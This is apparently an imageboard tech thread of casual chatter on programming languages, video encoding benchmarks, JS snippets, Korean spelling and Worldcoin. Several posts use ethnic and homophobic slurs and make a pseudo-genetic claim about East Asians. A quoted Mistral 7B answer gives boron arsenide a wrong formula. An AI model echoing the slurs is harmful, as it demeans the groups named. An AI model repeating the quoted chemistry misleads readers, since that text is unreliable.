coffeescript was just fancy lamda functions with the same sig, return last value, avoid bind self memetics copied as is into es6
plus some python stuff to show that its possible to offer the same comforts in javascript like multiline strings, interpolation etc
i guess rust enums are pretty fun for building compilers, self hosting is overrated
here's another podcast for your entertainment needs from rocman
coffeescript was a cool idea in the days of ES5, but it quickly became obsolete with ES6+ (and Coffee/ES6 are drastically different)
it had some nice syntax features, but also tons of bad ones
I read the links, yeah, Brendan says it influenced him a bit (mainly syntax for arrow functions and class/super), but overall:
>Anyway, the main motivation is to avoid more grammar complexity. As I’ve noted elsewhere, TC39 won’t go for the kind of disambiguation pass on lexed tokens, followed by (Jison-generated) bottom-up parsing, that CoffeeScript uses.
>return last value, avoid bind self memetics copied as is into es6
that's one feature (arrow functions)
and here he actually wanted another syntax for them
dunno why you think coffee was so influential. it was just one of the few transpiler languages around at early 2010, so people had to use it because coding in bare ES5 will drive you crazy (arguably worse than C89)
and features like string interpolation/destructuring/classes/default params exist in basically any scripting language, so ES6 didn't copy them from Coffee
btw indentation instead of curly braces only work in Python
and maybe Haskellfor some reasonlack of braces in Coffee/Moon is disgusting even Ruby is better because it has explicit "end" (and Lua too)
>lack of braces in Coffee/Moon is disgusting
yeah indent only blocks were hard deprecated by automatic formatting poor python...
>were hard deprecated by automatic formatting
with prettier/black I dunno how could I do it all by hand
maybe I had a lot of energy when I was younger...
>i guess rust enums are pretty fun for building compilers
ADT mostly, people love to write compilers/type checker stuff in functional languages. I was mainly OCaml(ML)/Haskell before, flow and first version of rust were written in OCaml
>self hosting is overrated
but fun
I don't understand the Elm thing
I heard about it a lot but never cared to check because always had better tools...
and now Zig too seems unnecessary at all
and ton of other stuff like Julia
I'm just trying to find few best languages to concentrate on but people keep shilling new shiny stuff
it's usually not too hard to tell within few minutes is it any good tho, but other people keep falling into the trap and spending efforts on it, stealing community time from good languages like rust
capitalism can't be helped...
also Clojure, Scala. they keep inventing...
but Kotlin, Swift, Mojo seem good because solve real pain point. on the other hand Roc doesn't solve anything, just programming exercise for few people...
if only we could somehow forbid developing of that useless stuff which brings no walue. but dunno how to do that, such system would be prone to corruption because people are flawed creations
rust is complicated enough that few people can somehow spend effort on it
plus it already has a ton of smarties paid to work on it, even random companies like huawei employ people to work on rust with no more briefing than "make it gud idk"
but i heard java is getting all the good stuff from it like optionals and... was there anything else? basically it was just anotha coffeescript
>rust is complicated enough
welp... duplicated efforts for packages porting seem way way worse than dealing with borrow checker nim. and you can improve rust too...
when I was starting were was no
syntax for avoid boilerplate error handling yet, so they improving usability of the language
meanwhile go added layman package manager and layman genericsmaybe because I've already had that experience before so not so interested in developing ecosystem from scratch, but many fresh programmers are lured by the idea (because you get instant dopamine reward). welp, it's all because of stupid human biological design
I'm not into JVM stuff much, but I heard the bestest thing is null safety
and the syntax too. imagine Kotlin=Coffee, Java=ES5 (or even ES3 )
never written more than 500 lines of Java code in my life tho, just can't touch that stuff
maybe because I hate IDEs too
rust (native) tooling for JS becomes popular, I like that
people actually aren't that dumb and don't take the "just buy faster computer bruh" meme seriously
but serious harm was already done, millions of hours waiting for completion of inefficient JS scripts written by lazy amateurs...
deno has that for free with dprint tho
another massive win from Ryan, how is he so cool
if only we could combine Rust, TypeScript, Go, Deno
VSCode, Chrome, QtAndroid, iOS, Windows, Linuxinto a single thing, imagine the develop experience
but lack of threading in JS/V8 is too bad
dunno what to write scripts/backend stuff in
python+mypy technically can work for scripts such as scraping, but not much better than js, can be even slower than v8 and type checker is stupid
rust is too complicated for scripts/web stuff
golang is nicely suitable but I hate it with passion
chatgpt shilling for python
if only we could have something in between Go and Rust
maybe Rust with GC, default unsafe and disabled borrow nim?
seems like there's no stuff I need
so cringe
>10k Bounty for Rewriting Prettier in Rust
so deno's dprint is so cool anymore, we have biomi in nodejs
need to try rust again
maybe it's not that bad for simple stuff
but probably is
eslint users btfo imaging using such a shitty tool
but how do I switch it works fast enough for me garbage collected, statically typed, null safe, edgy, controversial
oh, I've seen that too. is it better than Roc and Zig?
how?'s hard to know how much is marketing speech
>doesn't support HTML and Markdown
sorry biome nim, I'm ok with prettier for now
so basically capitalism created the rat race where you need to lie to gain some success (i.e. write github readmes with cool images and slogans) and then suddenly they caught someone doing this and look really surprised
>Prettier's README already says that its speed is "blazing"
if tsc and prettier are fast for me, imagine how fast stc and biome would feel like
insanely fast
his examples of why roc is better than rust are extremely stupid
so if not V and Roc, maybe Zig is ok
or Go because what else can you do
there's also Nim
blazingly fast🔥
stop, I forgot about Mojo
thank you Jesus
do you know how it came to my mind?
fucking memory, why do you work in such weird ways
but if I import slow python package into mojo, it won't become faster
well, may help a bit, at least you can rewrite very slow stuff easily
now need to think Rust vs Go vs Mojo like it's on the roadmap of having optionals and enums so maybe at some point in the future
well it's python replacement, not rust replacement (it's superset of python)
should be very fast and comfy for scripting tasks, if you don't want Rust or Go
no even package manager yet. yeah, it's too yearly
have to use js/python/go/rust for now
stupid sexy rust with its imbalanced enums
>stupid sexy
i wanna get into sqlite
sqlite is not sexy
it's always on top of the latest news, advances and tooling
닝닝 only likes guys who use nosql
Ruby is still strong
and Python is very strong
>familiarity. and rust seems to be winning the war for web development tooling, at the moment. zig (by way of bun) may make a good stand if bun were to produce such tools too, as standalone. it’s a high barrier if bun has to be adopted wholesale in order to have a pretty printer.
stupid ziggers with their bun
Rust is so good that it became a no-brainer advice to rewrite old C codebase into, and because people are flawed they like to give unasked advices and devs starting to hate the language, not the stupid people who can only give advices
yet another case of inferior human biological design
pipenv vs poetry
that thing is too expensive for what it can do == !
will probably flop just like google stadia
absolutely no killer apps and I doubt you can use it instead of normal displays all day long (at the very least your head will hurt). so if you only use it few hours a day, why even bother
M2 10 cores 16GB RAM 1TB SSD inside your headset is kinda cool tho
you can compile Chrome and encode videos on that lol. but why tho
that guy is a fucking genius
I wish I could do pretty design like the guy too, not just engineering
maybe AI can help but that v0 stuff isn't that good yet through the tour while thinking garbage collected, statically typed, null safe, uncontroversial, amazing.until start thinking where's my return keyword
there is no early return
it's over my brain is not good enough for a hierarchical giga match expression to find all the special cases
that's probably EVM design
haven't found ANSI version of magic keyboard
ISO is inevitable
but I can't get used to small fn keys on logi either
what do...
threre's no return in Haskell either, try coding in that first, that will teach you manners
there's return keyword but it doesn't do what you think
err it's not keyword, just a normal function
i guess the monadic thingymagics make up for it
elixir's moe nade replacement however...
why do even need Erlang
I thought you're a normal guy who only believes in Rust... not some Erlang/Clojure type of weirdo
% lua -e 'print(("%F"):gsub("%%F", "%s"))' lua: (command line):1: invalid use of '%' in replacement string stack traceback: [C]: in function 'string.gsub' (command line):1: in main chunk [C]: in ? % luajit -e 'print(("%F"):gsub("%%F", "%s"))' s 1
I'm afraid I can forget even alphabet nowadays
yesterday I was thinking for 5 seconds whether "n" comes after "k" or before
I guess brain is too good at deleting things you rarely use
svt-av1 4 fps
>Encoding with 10-bit depth results in more accurate colors and fewer artifacts with minimal increase in file size, though the resulting file may be somewhat more computationally intensive to decode for a given bitrate.
what about high bitdepth references
x265 medium crf25 40fps 2.4MB file
svt-av1 preset9 crf37 36fps 2.5MB file
90.736549 vs 91.457781 VMAF
same shit
fucken idiots, I tired of that infinite shit of useless dependencies
x265 preset fast vs svt-av1 preset 10
44 fps vs 60fps
89.936782 vs 90.165639 VMAF
AV1 isn't that bad it seems
x265 slow fps16 vmaf94
svt preset6 fps13 vmaf94
svt preset7 fps23 vmaf94
svt preset8 fps29 vmaf93
so it seems good only on faster presets, on slower there's little difference with x265
libaom-av1 cpu-used 8 row-mt 1 tiles 4x4 17-20 fps max
and same VMAF as x265 slow
didn't know svt-av1 is that good. so encoder for av1 chosen
now just need to decide 8bit vs 10bit and preset medium vs fast and do more VMAF tests
gotta go through tutorial for each language to find the best brainlet compatible lang
surprisingly it still seems to be rust
>best brainlet compatible lang
not for the dumbest of us
>any value might be none at any point
>very tiny guard rails offered by types
>try except jumpy jump control flow
>the absolute state of mutable default function arguments
>try except jumpy jump control flow
>any value might be none at any point
well at least you can't
[0] == '0'
got pizza in 20 minutes
macos doesn't support because swdec on mobile is meh
mozilla doesn't support because fucken retards
I won't give a fuck about firefox is it simple enough for me brain
too slow
what did they mean by this
what's more important: Firefox users or Safari users?
>USB-C Magic Keyboard, Mouse, and Trackpad Could Arrive in Spring 2024
maybe I will be able to buy ANSI magic keyboard with USB-C
av1 is future-proof tho
do you have a webm of her showing c++ code on the whiteboard?
this youtube channel is so dumb
probably not
hyperthreading is one of the most retarded things on x86 isa
tired of coding
maybe need to read now
I solved the mystery. it's the Denisovan DNA admixture that makes East Asian girls attractive
>A 2018 study of Han Chinese, Japanese, and Dai genomes showed that modern East Asians have DNA from two different Denisovan populations: one similar to the Denisovan DNA found in Papuan genomes, and a second that is closer to the Denisovan genome from Denisova Cave.
>It is recommended to not use Film Grain for presets greater than 6 as it produces a significant compute overhead. This combination should only be used for debug purposes.
nobody gave me reputation points for answer on stackoverflow
>Preset 8 with grain is ~3x slower than preset 8 without grain (quick test with 4K material and an AVX2-capable CPU, measured with time). Grain synth alone takes up the equivalent amount of CPU time of encoding 4K at preset 7.
stupid grain
but encoding grainy videos without grain option seems unwise, codecs with smooth out everything in that case
>DNA evidence suggests they had dark skin, eyes, and hair, and had a Neanderthal-like build and facial features
wtf is that photo
what do when you encoded something, it looks kinda okayish, but you don't want spend time inspecting it much
so it could contain huge issues like here >>1013683
small CRF should normally work tho, even if preset is fast
nah, too afraid of switching activities. what if I won't like reading on kindle, so that purchase was useless
need to wait for a proper mood
>but you don't want spend time inspecting it much
what if you check VMAF
># Get VMAF score with harmonic mean to emphasize small outliers
>HM(90, 87, 1, 91) = 3.87
so if one frame is bad you get really low score and you don't need to check everything manually
problem solved
why didn't they switch to main branch
can't calc vmaf for matroska and mov containers, some timestamp sync issues
NUT worked
I hate timestamps, there's always some weird issues about them
found bug in ffmpeg
it was fixed month ago, lol
spend 20 minutes debugging that on 6.1.1
honestly → 어니스틀리 (어 instead of 허, just like /ˈɑnɪstli/)
sneaky gooks
That's how English speakers pronounce it though.
why do they write 막내 as maknae then
Things tend to get hangulized roughly the way they're pronounced, but romanized the way they're spelt in Hangul.
that's not 어니스트
It's a hot mess.
어 being kinda midway between 오 and 아 seems so clear sometimes i wonder if i'm going to learn to recognise it some day
I just ignore it and assume 어==오, 여==요
I'd understand if you were learning North Korean Korean, where the sounds are more similar, but it's easy otherwise. It's the difference between run and Ron, done and Don, love and loathe, Seohyun and Sohyun, Seola and Sora.
>run and Ron, done and Don
Well, maybe not for Americans.
the loan word version of 어 ron vs run might work, but theres no way i'll recognise seohyun vs sohyun in some sentence unless directly comparing the two words
>the researchers recognize that Aissam may never be able to understand or speak a language, Dr. Germiller said. The brain has a narrow window for learning to speak beginning around ages 2 to 3, he explained. After age 5, the window for learning spoken language is permanently shut.
>the window for learning spoken language is permanently shut
scary stuff
can we somehow reboot the neurons in language center or it's deeply connected to all memory and personality core
That applies to people who have never learnt a first spoken language, not us.
it's also about how good can you learn language being adult
if you're exposed to 2 languages being infant is much much better than
learn 1st language when you're child + learn 2nd language when you're adult
VMAF done
didn't expect it to take so much time, about 2 days for all corner cases
but that stupid SVT-AV1 always has very nice VMAF, even with CRF=63. it's probably cheating
so dunno is it even useful feature
transliterations like 어니스틀리 are turned into a single morpheme in korean.
막내 on the other hand is 2 morphemes: 막 + 내. the phonological rules that make it 망내 are subconscious for a native speaker it's just as easy to read.
such morphophonemic spelling is also very good for writing since native speakers don't consciously think about the fully phonemic spelling of a multimorphemic word. easier to write 좋겠지 than 조케찌. i can't stress enough how much of a nightmare it is to consciously adjust the spelling of morphemes based on the context that is otherwise subconscious. so much easier to just whip out a quick 는 after a verb instead of suddenly realizing "oh wait, i'm about to write 거, quick let me spell 능 instead" and having to keep your guard up the whole time.
the disparity between an adult's and a child's ability to learn a language is highly overblown and sensationalized. it's real but adults can learn languages just fine. people believe it's a big deal likely because of inefficient teaching, like not doing anywhere near enough oral or immersive practice.
>but adults can learn languages just fine
not on the level of bilingual kids tho
what to do with the heavy grain already badly smoothed out by youtube's VP9 encoder
it failed badly on heart emoji
I knew it can't be that simple with unicode-nim and UTF-16/UTF-8 mess
it's not the function
it's the MuJS
took me 20 minutes to debug
it was fixed 2 days ago in the master
how the fuck is that even possible, I've got similar thing just day before >>1020701
aaaaa it's all the matrix
this time it's real 끝났다
I'm not going to fix bugs in core JS functions
fuck this shitty interpreter
maybe it's finally time to enter lua
I've already committed for TypeScript cool website
workarounded that anyway
but I lost my hope
seems like you have to either create extra variable or function wrapper with narrow type
but I don't want to
I've found
satisfies keyword introduced in TS 4.9
>Apple is bringing sideloading and alternate app stores to the iPhone
finally I can get by banking apps back
>Here’s how the new “alternative app marketplaces,” as Apple called them, will work. Users in the EU and on iOS 17.4 will be able to download a marketplace from that marketplace’s website.
>Users in the EU
oh no
>There will either be a lot of angry Europeans seeing their 3rd party app stores and sideloaded apps disappear when they travel, or there will be a gray market for EU iPhones shipped to the US.
nothing works...
it's 끝났다 all over the place
escaping issues are horrible
tired of multiple levels of escaping here and there
finished robust escaping for all type of arguments, that was exhausting
so many things may go wrong if you deal with CLI arguments with arbitrary separators/quoting
GUI sucks so much when I actually use my own software
lots of bugs, including upstream ones which I can't fix in near terms
developing software is suffering
first you have cool concept, but then it fails badly under real world circumstances
the only solution is to slap bunch of different tools on top of each other because they have different bugs which don't usually overlap. but then the resulting product is bloated
found another workaround
it's pile of hacks on top of each other at this point
found great popular science video about language structure and what's different/common with human language center and LLM
too bad can't show it to linguist chingu because it's not in english
which language
what do we think monkeytypebros?
60 is impressive apparently like nitter is officially over, this team for reals
luckily i dont follow kpop that much anymore so i havent use it for some time
what's the problem with using X instead?
tired of coding, this team for reals
now gonna game and read
>Some newbies were scraping nitter heavily
some air keyboard with no tactile feedback?
they talked about it in the video. there're 3 methods:
- move fingers in the air (there's animation feedback, i.e. virtual keys don't press instantly but have some travel distance)
- move your eyes and use tap gesture
- voice input
the eye tracker method sounds interesting
>Fei Fei
아 그래
난 躺平
oh nice, you can buy 15W wireless power bank now
much better than apple's stupid magsafe battery pack
now just need to buy fresh iphone and good power bank
10,000mah, nice
however you get faster charge only mostly during first 15 minutes, then it probably heats up too much at 15w wireless charging
still should be convenient when you phone is dying but you need to use it actively
read for 15 minutes on kindle and already procrastinating, back to social media
well, I think I can read few books anyway, but not sure I can make it a habit
also why the fuck that stupid pirate books website has dozens of version of each book
I have to spend 20 minutes to select which one is the best
also I'm trying different kindle features instead of reading
>read for 15 minutes
>procrastinated for 2 hours
I knew that we'll find out if mr. copilot can be discarded and replaced with a simple local run 13b modellino
dunno, why would you heat GPU of your computer if you can ask Azure servers to do that for you instead
unless you install it on a NAS with proper GPU
>I like to keep it set to show “page in book,” but it randomly changes it for no apparent reason
>You may be tapping on the bottom left hand corner of the display accidentally. It happens to me sometimes.
that was my first thought but it happened 3 times and I decided it can't be me, that must be some bug
but people on reddit say it's me who accidentally tapping on the bottom of the screen
can't believe amazon couldn't fix that stupid UX bug for fucking eleven generations of their reading devices
certainly not gonna replace a copilot sub with an azure account i am however officially off copilot and expecting good things from continue
I mean copilot runs inside microsoft's (azure) cloud
tired of coding, now wanna do some math instead
the most curious technology along with trash chutes in apartment buildings not ready to handle pizza boxes
you mean you can order pizza and throw the packaging using garbage disposal?
thus you don't have to ever (and I mean it) leave your house for years?
>don't leave your house for years?
pizza boxes stuck in the chute was a friends joke
my m1 llm said they still exist in some places, sounds fun
I didn't watch friends, sorry
I mean more than few epswe have it in my country (some buildings have that feature) but it's mostly closed because apartment owners don't want the rats
some ideas turn out to be bad
in spain its common to have underground trash bins to save space for the street but it's not at all secured so its a gold mine for rats and cockroaches and they spread well to nearby buildings
now that i dont have to censor myself from curious openai employees what should i ask from LLM after being extra careful about the questions for 2 years its not easy to come up with things
so you're Spainchingu?
>what should i ask from LLM
sometimes it can suggest something interesting >>1017840
but another time it's basic stuff you knew yourself >>1006218 ➡
I think in their current state AIs are only helpful for pabos, but if you've reflexed on different topics for some time, AI can't help, because everything it suggests you know already, but going deep requires serious thinking/computational resources and AIs can't yet do that
or the question simply can't have definitive answer. or maybe you have to experiment, which AIs can't do either
the more complicated question is whether to google or ask chatgpt
I still mostly google because of the habit, but FOMO tells me asking chatgpt directly could be better
not sure
I couldn't find english source
basically you can't resolve any .ru domain right now because some idiot messed with DNSSEC
.국? korean website
it's google translate special website for "translate webpage" feature
it mimics the original website, the original URL is
finally some cool content to watch
I have to update onedrive tokens every 2 years
somehow microsoft thinks it's more secure

yeah typing seems pretty bad
let me try i'll get 100
do you have apple stores nearby? may try after 2nd february there

that's cool
seamless integration between macos and visionos apps is kinda cool
but we had that feature with ipados for a long time too
oh no, it's not the chrome issue
oh, I can update to 14.3
will see if it fixes the bug
also finally can enable stolen protection on ios 17.3
but not sure I want to, what if I accidentally lock myself out

is it just me or optic id is insanely futuristic?
it's not gimmicky like in case of facebook with its half-assed mixed reality apps, here you have full access to Apple's ecosystem with million of apps in app store (only ipad apps for now, but still) and you pay for that with your literal retina fingerprint, like in sci-fi movie
but I'm sure it will flop anyway. maybe in 10 years it will have some success
the kid from openai has been collecting peoples retina fingerprints, sounds like he has the keys to the future
>the kid from openai has been collecting peoples retina fingerprints
samuel alterman
the fuck
well, apple stores touchid/faceid data on device in a secure enclave, should be quite safe
at least on paper
>Worldcoin attempts to recruit new users to join its network by getting their iris scanned using Worldcoin's orb-shaped iris scanner in return for some Worldcoin
>Founded in 2019 by OpenAI chief executive Sam Altman
how on earth people ignore that and never mention
this is a fucking privacy-nightmare scum and he gets away with it
>Sorry kid, but you’re not going to be bringing Gattaca or Minority Report to the world despite how much you think you are.
some comments are funny
luckily world isn't completely crazy yet
but all of it is just Overton window, isn't it? nowadays we're happy with sending all code on your computer and all private information to the random cloud such as Copilot/Bing. maybe few years in the future we will be fine with publishing our iris data too
>Gunungguruh was not alone in receiving a visit from Worldcoin. In villages across West Java, Indonesia—as well as college campuses, metro stops, markets, and urban centers in two dozen countries, most of them in the developing world—Worldcoin representatives were showing up for a day or two and collecting biometric data. In return they were known to offer everything from free cash (often local currency as well as Worldcoin tokens) to Airpods to promises of future wealth.
why nobody mentions that when talking with Sam Altman?
>In before stealing people’s hair to clone a baby to biohack people’s assets
>It’s just cheaper and easier to run this kind of data collection operation in places where people have little money and few legal protections.
>Pete Howson, a senior lecturer at Northumbria University who researches cryptocurrency in international development, categorizes Worldcoin’s actions as a sort of crypto-colonialism, where “blockchain and cryptocurrency experiments are being imposed on vulnerable communities essentially because…these people can’t push back,” he told MIT Technology Review in an email.
fucking western hypocrites...
>why nobody mentions that
what if "Great Reset" memes aren't even the memes and it's all actually intended to be like that
absolute state of youtube comments in 2024:
>I was sitting here watching this thinking “Is this one of the best product reviews I’ve ever seen?”
I want to die after reading this
is this the dumbest channel on youtube?
they talk the way they inform you about super important super complicated things, but all they talk about is some half-assed speculations made by mediocre journalist
pay per view on the tubes is surprisingly high so he might be smartest instead
full screen video ads are expected to take the full concentration of viewers so they pay a million times more than an ad on some website
i suppose the next step will be AR and VR ads with eye tracking to make absolute sure the ad is received well by the viewer's brain
>i suppose the next step will be AR and VR ads with eye tracking to make absolute sure the ad is received well by the viewer's brain
it was in Black Mirror episode
also, quite interestingly, that same episode showed how money turns any good idea into shit
people just can't resist the devil, right? or the few ones who actually can, don't matter much, they will be abandoned by their own fans, like Stallman and Assange
so on next week youtube will entertain us with vision pro videos
and then it's over, no new cool devices or features. that stupid new s24 ultra couldn't attract attention even for 2 hours, samsung failed really hard
maybe openai will publish something cool
does he pay for that fucking subscription of mindnode too?
it's very stupid that apple created VR headset which is mostly for opening 2d apps if you think about it
why would you keep that heavy thing on your face if it's just 2d display replacement very gimmicky and useless
15 wpm
you underestimate my
*steals your retina pic*
what are you gonna do now, use new eyes?
will ask my waifu to buy something for me
>watched video from Ethiopia's capital
>skyscrapers and hundreds of cars on the street
wtf, in my mind Africa wasn't like that at all (except South Africa of course)
>eye tracking
too real
youtubes already record which parts you watch and which you skip, eye tracking record will fit right in
all he did was dumping storage via JTAG, mounting the partition and finding which swipe combination corresponds to the stored hash of that swipe
security of android phones is lame
>stored hash of that swipe
like no even salt and brute-force resistant KDF, what was even the purpose of hashing
>You cannot reach 42 bits of entropy with a regular android unlock pattern. The 3x3 grid is limited to 389,112 distinct patterns, giving you an entropy of 18.57 bits.
entropy is too small anyway tho
so even if KDF takes 1 second on a weak ARM core, it's just 4.5 days or less than 1 day on faster computer
>When you tap that, you have the option to add a book AND it shows all the existing bookmarks. You can tap any bookmark in the list to see a pop-up of the page. Then you can tap the pop-up to go to the full page.
very intuitive UI, amazon-nim, I have to google how to use bookmarks feature on a fucking reading device
how do you remember whether to use
,for in
orfor of
in the yahwehscripts my memory is bad
only use
for of
is kinda nice because functional style with pure function could be cleaner code. but you can'tbreak
from a loop
for in
is outdated and isn't needed in modern JS
I'm getting better with reading, read 22% of the book already
but the book which had tons of good recommendations seems a bit stupid sometimes, I literally can trace author of the book being stupid with some of its reasonings and it's hard to ignore like when you watch youtube video and author said something stupid, you instantly want to turn it off
at which point it's ok to drop the book if you don't like it much?
if I drop it too early, maybe those stupid things are actually minor and it would have been better to continue. but it surely isn't worth to finish book you don't like at all
I'm thinking 25-30% could be a nice checkpoint
>functional style with pure function
well it's mostly for
. forEach is by definition couldn't be pure because it returns nothingbut you got the idea
thinking about the map reduce filter side of things many times you don't really want to use them since it can get real messy especially in rust if you mix in async or result. in my experience about 30% of time you end up just for eaching stuff.
in that sense the gopeople might be right that its better to have only for loops available to keep things simple and people's code more standardised. on the other hand if you want the hero path you gotta have map fold and filter ready like languages with a pipe operator do
i wonder which side chloe leans toward: variables mutated inside for loops or hero values piped through functional operations
I don't like complicated .map.filter.reduce chains, but if it's 1 or 2 functions and you don't have to do "break", then
perfectly shows the intention and the code is very cleandon't mention go as an example of language design. it's the worst
for dumbos like me who always wonder what is the best way it might be cool to reduce available options maybe
maybe my mind is too corrupted by functional programming languages?
but I think the first option on pic is better
not because the number of lines is smaller but because the intent is clear
but unfortunately with functional approach often it becomes messy if you need to do something more complicated than that
my mind is too corrupted by rust
i want to try other languages but then realise they might not have options or serde or even
i just want to get a simple function working without using a dumbass repl or rerunning the whole program, or setting up some massive test infrastructure
and then thinking whether the function should be public, if it is not i can't even run it from the test file. i just want that local unit test in the same file im already programming in. but only rust has it
>and then thinking whether the function should be public, if it is not i can't even run it from the test file . i just want that local unit test in the same file im already programming in. but only rust has it
try this approach
not very elegant but works
>setting up some massive test infrastructure
dunno, unit tests are very easy to setup in most languages... nodejs even has
flag so you don't need to install extra packages too
export const exportedForTesting = { shouldntBeExportedFn }
pretty good
>how do you do debugging?
>printf, panic, stuff like thinking
wish i was smart like mitchell, the billionaire go programmer i also want to think but i'm too dumb
well you're watching advices from a dev who's coding some small primitive stuff
listen to someone like Carmack instead, he strongly advices to use debuggers instead of printf
I trust Carmack more
>Romero's favorite programming language as of 2017 is Lua
lol, he is game designer
tab completion is in and the results are out
it doesn't really work yet maybe just a few more months of copilot and then i'll test again and it'll be great for sure
>it doesn't really work yet
of course it doesn't, open source projects mostly suck because hard to make money on them
oh no, another feather for golangman's cap
i didn't even realise first i couldn't just throw inside puppeteer evaluate and expect it to bubble up like
const retrieved_info = await element.evaluate((el) => { const info = get info if (something unexpected) { throw new Error("something unexpected"); } return info });
so had to go with the golang model
const [retrieved_info, error] = await element.evaluate((el) => { const info = get info if (something unexpected) { return [info, "something unexpected"] } return [info, null] }); if (error) { throw new Error(error) }
that robin bike knows a little something about reducing the tyranny of choice, he just went a little too far on some other fronts
>i didn't even realise first i couldn't just throw inside puppeteer evaluate
what do you mean you can't?
evaluate won't reject if its callback throws?
my laptop won't charge. but it also won't lose battery when plugged in. help
async function evaluateWrapper(elelement, cb) { const [ret, err] = await element.evaluate((el) => { try { return [cb(), null]; } catch (err) { return [null, err]; } }); if (err) { throw new Error(err) } return ret; } await evaluateWrapper(element, (el) => { const info = get info if (something unexpected) { throw new Error("something unexpected"); } return info });
unrelated but one time me iphones hardware buttons froze and it was before there was a shut down option in settings so i had to wait for the battery to run out to turn it off and on again. first i tried playing videos from the tubes but that h264 decoding is too efficient it had no effect
>it was before there was a shut down option in settings
there's hard reset combination, like holding few keys for 15 seconds or so
what if you take the battery out and plug it in without it
>take the battery out
he would have to disassemble his notebook if it's new enough
this is the scitech thread, it's no problem
i'd have to disassemble it
seems ok yeah
no need for jester and jest config files everything built in
maybe it's limited to 80% charge to preserve battery life
>no need for jester and jest config files
% npm i jest added 291 packages in 9s % find node_modules -type f | wc -l 4093
what sane person would use that kind of shit
i guess it'll just be at 16% forever and no longer portable
pytest for example (most popular unit test runner for python):
% python3.12 -m venv .env % find .env -type f | wc -l 1029 % .env/bin/pip install pytest % find .env -type f | wc -l 1258
just few packages and few hundred files
but the .env itself isn't very light weight tbh
facebook likes to build on the shoulders of many small giants, check also create-react-app
>it's no problem
dunno, unscrewing is no problem, but those plastic clips is a huge PITA
you can easily break few of them if aren't careful enough or doing it for the first time
just retarded development practices
if any lib has more than 10 deps overall, I would think a lot before using it in my app at all. even more than 2-3 deps often feels unnecessary
this wasnt even the original problem
i was trying to return a Map from evaluate but it can only handle serializable thingies so had to go with an object instead
maps, objects, just another tyranny of choice robb pique is laughing at us
i like the guitar thingy for opening laptops
>If the script returns an object, Puppeteer serializes it to a JSON and reconstructs it on the script side
lame, you normally expect it to be structuredClone'able
>maps, objects, just another tyranny of choice
again, objects for storing hashmaps are outdated, you only use Map/Set nowadays
>so had to go with an object instead
not necessary, you can
> m = new Map([["a", 1], ["b", 2]]) Map(2) { 'a' => 1, 'b' => 2 } > new Map(JSON.parse(JSON.stringify(Array.from(m)))) Map(2) { 'a' => 1, 'b' => 2 }
seems a bit mean to the fella to have the clickbait on and have people think its gonna happen
this shit is too funny
>I just think that Apple should
>2:50 be able to do whatever the heck they
>2:52 want to do they're private company and
>2:54 if you don't want to buy their products
>2:55 don't buy their products now that being
this man is clinically retarded
he probably does it for the likes
btw, how do you get those transcriptions?
there's a button at the end of the video description
they are pretty handy
good source for LLM training data tbh, if you grab those from all youtube videos
you can predict everything at this point, right
like even every type of reaction to the asteroid crushing Earth event, like they did in "Don't look up"
apple users right?

poor Winter was forced to use old Macbook
bought SSD to Thunderbolt 40Gbps enclosure just for $70 (from Orico, but newer model with a fan)
hope it's not a scam, price is quite good
found it even cheaper for $58
I hope it will fork fast enough because it might be hard to return in that cheaper place
found another model, a bit more expensive, but looks more solid and more reviews
maybe I would be able to return that one >>1025426 if it's bad and re-order this one
a fan
yeah, fast SSDs and microcontrollers for SSD/USB protocol handling heat up too much without active cooling
wonder how long its gonna take for them to proof the concept and companies start using it
almost bought a new router last year because it was on sale for half price but it had a fan aint no way i need to thinking about some dusty fans on a router too, i need that solid state cooling
is that yet another snake oil?
looks like theres some reviews by those youtube people you like
I bet apple engineers facepalmed really hard if they ever watched that video
there must be some hidden detail that faggot forgot you to tell about which makes that new cooling system not any better than the default one
even regular macbooks run cpu at 105 degrees can't believe ive ever worried about cpu temps
i guess ssd temp is something that might have to be lower, google says around 65 degrees would still be healthy
you have a macbook pro right? you should do a longer ssd performance test some day and report back the temperatures
maybe apple has researched the proper ssd max temps
turn this on before sleep
I've read a bit about it, people say
>too expensive for what it can do (10W at best)
>vibrations might be too dangerous for the soldering
>possibly bad ultrasound influence on people/pets
there's even device with that thing already, but seems like it's insignificantly better than just passive cooling
sounds like its gonna take years then to see if it'll even work out
at least we have our huge aluminum cpu cases, plus that tiny aluminum sheet apple uses that is somehow enough for cpu running on 14 watts
after listening to sounds like golangman has the same ideacan't say the same about rust stuff, theres probably 10-20 direct dependencies on most crates so hundreds in total
it consumes 1W per 5W heat dissipation, is that ok?
it says M3 (non Pro/Max) is just 20W max, so if you use e.g. 2 of those airjet units, it consumes 10% of the CPU, being only a bit better than the passive cooling solution
so seems like not a very nice solution for notebooks
probably should work for routers if they can make it cheap
damn and macbook was already within 10% of macbook pro performance, i guess macbooks already being a huge aluminum block just kind of works out in the end by itself
interestingly frore seems to put a lot of marketing effort into the laptop possibilities
>frore seems to put a lot of marketing effort into the laptop possibilities
more money and marketing possibilities there ("first laptop with ssd cooling")
but one problem, laptop engineers aren't stupid, if they see it doesn't work, they won't use the technology
>a huge aluminum block
need to make it from copper
can you make boron arsenide laptop case tho
google doesn't know the answer
chatgpt also doens't know
you asked what to ask LLM >>1024090: well, as you can see, they just a bit faster search engine, no magic at all
>theres probably 10-20 direct dependencies on most crates so hundreds in total
oh yeah, I was building one rust tool recently and it downloaded around 100 deps
it won't matter for the end-user because all statically linked inside the binary, but bad for development
not sure how to solve that problem
>Boron Arsenide (B_3N_2) is a covalent compound, which means that its crystalline structure consists of tightly bound atoms. It is not a material that can be easily molded or formed into complex shapes like a laptop case without significant processing and engineering efforts.
>Moreover, Boron Arsenide is not a commercially available material for making laptop cases due to several reasons:
>Processing: Boron Arsenide is an inorganic compound that requires high temperatures and pressures to form into specific shapes. It is usually grown as single crystals or thin films, which are not suitable for creating laptop cases.
>Cost: Boron Arsenide is a relatively expensive material due to its complex synthesis process and limited availability.
>Laptop's structural integrity: Boron Arsenide has a high stiffness and strength. However, it is not known if it can provide the necessary protection for a laptop in case of drops or impacts. Laptop cases are typically made from materials like plastic or aluminum that can absorb shocks and protect the device.
>Toxicity: Boron Arsenide is considered to be relatively non-toxic when compared to other semiconductor materials. However, it may pose health risks if inhaled in large quantities or comes into contact with skin. Proper handling precautions should always be taken while working with this material.
t. mistral 7b
wow it knows more than chatgpt 3.5
ask it about the price. the chatgpt basically said: I dunno, "contact suppliers or manufacturers specializing in compound semiconductors or exotic materials"
thanks, dude, what would I do without you
